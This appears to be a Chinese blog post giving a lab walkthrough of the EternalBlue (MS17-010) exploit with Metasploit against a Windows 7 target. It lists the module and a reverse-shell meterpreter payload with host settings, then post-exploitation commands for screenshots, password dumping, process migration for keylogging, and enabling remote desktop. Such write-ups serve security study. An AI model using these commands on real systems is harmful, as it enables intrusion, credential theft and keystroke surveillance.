• 永恒之蓝(ms017-010)漏洞利用


    永恒之蓝(ms017-010)漏洞利用

    1、实验环境

    靶机win7

    地址:192.168.1.xxx

    登录密码:xxxx

    攻击机:kail linux

    地址:192.168.1.xxx

    登录用户名:root

    登录密码:xxx

    2、实验原理:

    “永恒之蓝”的原理主要是扫描所有开放445文件共享端口的Windows机器。

    445端口简介:

           445端口是一个毁誉参半的端口,有了它我们可以在局域网中轻松访问各种共享文件夹或共享打印机,但也正是因为有了它,黑客们才有了可乘之机,他们能通过该端口偷偷共享你的硬盘,甚至会在悄无声息中将你的硬盘格式化掉! 201710月,由于病毒"坏兔子"来袭,国家互联网应急中心等安全机构建议用户及时关闭计算机以及网络设备上的445139端口 。

    实验步骤:

    Step1:启动msf

     

    Step2:搜索search ms17-010模块

     

    发现目标靶机上存在永恒之蓝漏洞。

    Step3:加载攻击模块并配置参数

     

    use exploit/windows/smb/ms17_010_eternalblue

    setp4:设置payload(设置攻击程序)

    set payload windows/x64/meterpreter/reverse_tcp

    setp5:设置相关参数

    show options

    set rhost 192.168.1.5 (靶机的IP)

    set lhost 192.168.1.88 (发起攻击的主机IP)

    set lport 443       (监听的端口)

     

     

    Step6:发起攻击,成功会反弹shell

    输入run或者exploit

     

    Step7:获取屏幕数据

     

    Step8:获取密码

     

    Step9:键盘监听

     ps 看浏览器或者记事本等进程号

    migrate转到相应的进程

    (1) keyscan_start: 启动时与如 Word 或浏览器的进程相关联的键盘记录软件

    (2) keyscan_dump 键盘记录软件的内容转储,此时可以看到刚刚在靶机上输入的内容

    (3) keyscan_stop: -停止键盘记录软件

    step10:开启远程

    1run post/windows/manage/enable_rdp,或run getgui -e

    利用此后渗透模块即可直接开启远程桌面

    2)KaliLinux操作系统中的rdesktop  靶机地址 命令即可直接使用root账号登录到靶机系统中

    愿路途漫长,以后莫失莫忘。 愿你不骄不躁,安稳顺心。

    作者:菜鸟-传奇
    本文版权归作者和博客园共有,不以任何盈利为目的,欢迎转载。但未经作者同意必须保留此段声明,且在文章页面明显位置给出原文链接,否则保留追究法律声明责任的权利。
  • 相关阅读:
    Tensorflow 2 flower_photos花卉数据集手动下载、离线安装、本地加载、快速读取
    [CC]ccHObject
    [CC]CC插件初探
    [g2o]一个备忘
    [PCL]keypoint
    [PCL]NDT点云匹配方法
    近邻搜索算法
    点云匹配和ICP算法概述
    [PCL]5 ICP算法进行点云匹配
    [PCL]4 PCL中图像匹配的几个类图
  • 原文地址:https://www.cnblogs.com/cainiao-chuanqi/p/14635951.html
Copyright © 2020-2023  润新知